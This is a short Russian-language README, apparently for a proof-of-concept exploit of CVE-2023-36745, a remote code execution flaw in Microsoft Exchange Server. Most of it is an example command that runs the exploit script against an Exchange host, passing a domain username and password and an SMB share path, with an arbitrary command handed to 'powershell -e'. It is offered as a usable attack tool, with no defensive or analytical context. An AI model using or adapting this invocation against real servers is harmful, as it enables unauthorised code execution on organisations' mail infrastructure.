
Эксплойт Proof-of-Concept для уязвимости RCE в Microsoft Exchange Server CVE-2023-36745, позволяющий выполнить удаленный код через инъекцию команд PowerShell с аутентификацией.
Эксплойт RCE CVE-2023-36745 для Microsoft Exchange Server.
Пример:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
Команда будет передана в powershell -e.